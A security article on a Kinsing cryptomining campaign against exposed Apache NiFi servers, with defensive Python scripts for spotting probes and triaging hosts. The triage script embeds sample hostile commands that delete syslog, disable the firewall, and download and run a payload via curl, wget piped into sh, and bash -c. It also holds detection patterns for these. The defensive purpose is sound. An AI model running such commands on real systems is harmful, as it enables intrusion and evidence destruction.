Research published by the SANS Internet Storm Center (ISC) describes an ongoing campaign by a financially motivated threat actor who is scanning the internet for exposed Apache NiFi instances and quietly installing a cryptocurrency miner on each one it can reach.
Mining is not the only consequence: a compromised NiFi host also gives the attacker a foothold from which to move laterally to other systems it can reach. The ISC first noticed the campaign as a sharp increase in HTTP requests for “/nifi” on May 19, 2023.
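A request spike like the one the ISC reported is easy to pick out of ordinary web-server access logs. The following script is an added example, not code from the ISC or from the article: it parses combined-format log lines, keeps only requests for “/nifi” (and its sub-paths), counts them per day and per source, and flags a day whose count jumps to at least three times the mean of the preceding days. The log lines, IP addresses and thresholds are constructed for illustration.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample in Apache/nginx "combined" log format. These lines are
# illustrative only (TEST-NET addresses); they are not ISC honeypot data.
SAMPLE_LOG = """\
203.0.113.5 - - [18/May/2023:10:01:02 +0000] "GET /nifi HTTP/1.1" 404 162 "-" "python-requests/2.28"
198.51.100.7 - - [18/May/2023:11:12:44 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.5 - - [19/May/2023:00:03:11 +0000] "GET /nifi HTTP/1.1" 404 162 "-" "python-requests/2.28"
203.0.113.5 - - [19/May/2023:00:03:12 +0000] "GET /nifi/ HTTP/1.1" 404 162 "-" "python-requests/2.28"
203.0.113.9 - - [19/May/2023:02:15:30 +0000] "GET /nifi?x=1 HTTP/1.1" 404 162 "-" "Go-http-client/1.1"
198.51.100.7 - - [19/May/2023:09:00:00 +0000] "GET /robots.txt HTTP/1.1" 200 43 "-" "Mozilla/5.0"
203.0.113.22 - - [19/May/2023:13:45:09 +0000] "GET /nifi HTTP/1.1" 404 162 "-" "curl/7.88.1"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]  # drop any query string
    return {"ip": m.group("ip"), "day": ts.date().isoformat(),
            "path": path, "status": int(m.group("status")), "ua": m.group("ua")}


def is_nifi_probe(path):
    """Match the '/nifi' path the ISC observed, including anything beneath it."""
    return path == "/nifi" or path.startswith("/nifi/")


def nifi_probes(log_text):
    """Return the parsed entries whose request path targets /nifi."""
    entries = (parse_line(line) for line in log_text.splitlines())
    return [e for e in entries if e and is_nifi_probe(e["path"])]


def daily_counts(entries):
    """Count /nifi requests per calendar day, in chronological order."""
    return dict(sorted(Counter(e["day"] for e in entries).items()))


def flag_spikes(daily, factor=3, min_count=3):
    """Flag days whose count is at least `factor` times the mean of all prior days.
    A day with no history is flagged only if it reaches `min_count` on its own."""
    flagged, history = [], []
    for day, count in daily.items():
        baseline = sum(history) / len(history) if history else 0
        if count >= min_count and count >= factor * baseline:
            flagged.append(day)
        history.append(count)
    return flagged


def top_sources(entries, n=5):
    """Most active scanning sources as (ip, count) pairs."""
    return Counter(e["ip"] for e in entries).most_common(n)


if __name__ == "__main__":
    probes = nifi_probes(SAMPLE_LOG)
    per_day = daily_counts(probes)
    print("requests for /nifi per day:", per_day)
    print("spike days:", flag_spikes(per_day))
    print("top sources:", top_sources(probes))
```

On the constructed sample, May 18 has a single probe and May 19 has four, so only May 19 is flagged; on a real server the thresholds should be tuned to the normal background of scanner noise, and a 404 for “/nifi” is itself a useful signal that the request was a probe rather than legitimate use.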
Pervasive Persistence
Dr. Johannes Ullrich, dean of research at the SANS Technology Institute, describes how the attacker keeps its foothold: it registers timed NiFi processors or adds cron entries so that the malicious job is re-run on a schedule. Notably, the attack script itself is never written to disk; it exists only in memory. That choice defeats file-based antivirus and integrity scanning and leaves little for a forensic examiner to recover once the process is gone, which is why the cron entries and scheduled processors, not the script, are the durable artifacts to hunt for.
The Honeypot Revelation
The ISC's honeypot captured the initial stages of the attack. The payload drops a shell script that first removes the “/var/log/syslog” file, disables the firewall, and kills competing crypto-mining tools; only after that groundwork does it download the Kinsing malware from a remote server and launch it. The order is deliberate: deleting syslog destroys evidence of the intrusion, disabling the firewall removes a control that might interfere with the rest of the attack, and killing rival miners keeps the host's CPU for the actor's own payload. It is the standard shape of commodity cryptojacking, and each of those steps is observable on the host.
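The persistence mechanisms and the preparatory script described in the two sections above leave host-side traces that a responder can check for. The triage script below is an added example, not code from the ISC, from the article, or from the malware: it scans a captured dropper script for the behaviours described (syslog removal, firewall disabling, killing of rival miners, download-and-execute), scans crontab text for entries that pipe a download into a shell, and reviews a process list for executables that have been unlinked from disk or launched from an inline fetch. The sample script, crontab, process table, IP addresses and the specific command and miner names in the patterns are constructed assumptions for illustration, not indicators taken from the report.

```python
import re

# Constructed sample dropper, modelled only on the behaviour described in the
# article (syslog removal, firewall off, kill rivals, fetch and run payload).
DROPPER = """\
#!/bin/sh
rm -f /var/log/syslog
ufw disable
iptables -F
pkill -f xmrig
curl -s http://203.0.113.66/kinsing -o /tmp/kinsing && chmod +x /tmp/kinsing && /tmp/kinsing
"""

# Constructed crontab text: one legitimate entry and one assumed malicious one.
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * wget -q -O - http://203.0.113.66/k.sh | sh > /dev/null 2>&1
"""

# Constructed process table as (pid, cmdline, readlink of /proc/<pid>/exe).
# On Linux a deleted-but-running binary shows up as "... (deleted)".
PROCESSES = [
    (1234, "/usr/sbin/sshd -D", "/usr/sbin/sshd"),
    (4321, "/tmp/kinsing", "/tmp/kinsing (deleted)"),
    (4400, "bash -c $(curl -s http://203.0.113.66/x.sh)", "/usr/bin/bash"),
]

# Assumed patterns for each behaviour; the miner names are illustrative.
SCRIPT_INDICATORS = {
    "syslog_removed":    re.compile(r"\brm\b[^\n]*/var/log/syslog\b"),
    "firewall_disabled": re.compile(r"\b(ufw\s+disable|iptables\s+-F|systemctl\s+stop\s+firewalld)\b"),
    "miner_killed":      re.compile(r"\b(pkill|killall)\b[^\n]*\b(xmrig|minerd)\b"),
    "payload_fetched":   re.compile(r"\b(curl|wget)\b[^\n]*(\|\s*(ba)?sh\b|chmod\s+\+x)"),
}
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(ba)?sh\b")
INLINE_FETCH = re.compile(r"\b(ba)?sh\b\s+-c\b[^\n]*\$\((curl|wget)\b")


def scan_script(text):
    """Map each indicator to the 1-based line numbers of the script that trigger it."""
    hits = {name: [] for name in SCRIPT_INDICATORS}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SCRIPT_INDICATORS.items():
            if pattern.search(line):
                hits[name].append(lineno)
    return hits


def suspicious_cron(text):
    """Return crontab entries that download something and pipe it into a shell."""
    return [line for line in text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")
            and PIPE_TO_SHELL.search(line)]


def suspicious_processes(procs):
    """Return (pid, reason) for processes running from memory-only or inline-fetched code."""
    findings = []
    for pid, cmdline, exe in procs:
        if exe.endswith("(deleted)"):
            findings.append((pid, "executable unlinked from disk: " + exe))
        elif INLINE_FETCH.search(cmdline):
            findings.append((pid, "shell running inline-fetched script: " + cmdline))
    return findings


if __name__ == "__main__":
    for name, lines in scan_script(DROPPER).items():
        print(f"{name:18s} lines {lines}")
    print("cron:", suspicious_cron(CRONTAB))
    print("procs:", suspicious_processes(PROCESSES))
```

On a live host the inputs would come from `/etc/cron*`, the per-user crontabs and `/proc/<pid>/{cmdline,exe}`; the process checks matter most here because, as the article notes, the script itself is not on disk, so a deleted-binary or inline-fetch process entry may be the only runtime evidence.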
Leveraging Publicly Disclosed Vulnerabilities
Kinsing has a history of exploiting publicly disclosed vulnerabilities in internet-facing web applications. In September 2022, Trend Micro documented an essentially identical attack chain in which the operators exploited unpatched Oracle WebLogic Server flaws (CVE-2020-14882 and CVE-2020-14883) to deliver the same cryptocurrency-mining malware. The lesson is the usual one: publicly exposed applications that lag on patches are the first targets of this kind of opportunistic, automated campaign.
Conclusion
A financially motivated actor turning its scanners on unprotected Apache NiFi instances is a reminder that any reachable management interface will be found and tried. The combination of cryptocurrency mining with the lateral-movement opportunity a NiFi host offers makes this more than a nuisance, and organizations should treat it with the corresponding urgency.
Prompt patching and an up-to-date infrastructure remain the baseline defence against Kinsing's usual entry points. For NiFi in particular, the targets were instances left unprotected, so patch level alone is not the fix: the management interface should not be reachable from the internet, and access to it should require authentication and be restricted at the network layer, with scheduled processors and cron entries reviewed for anything that should not be there.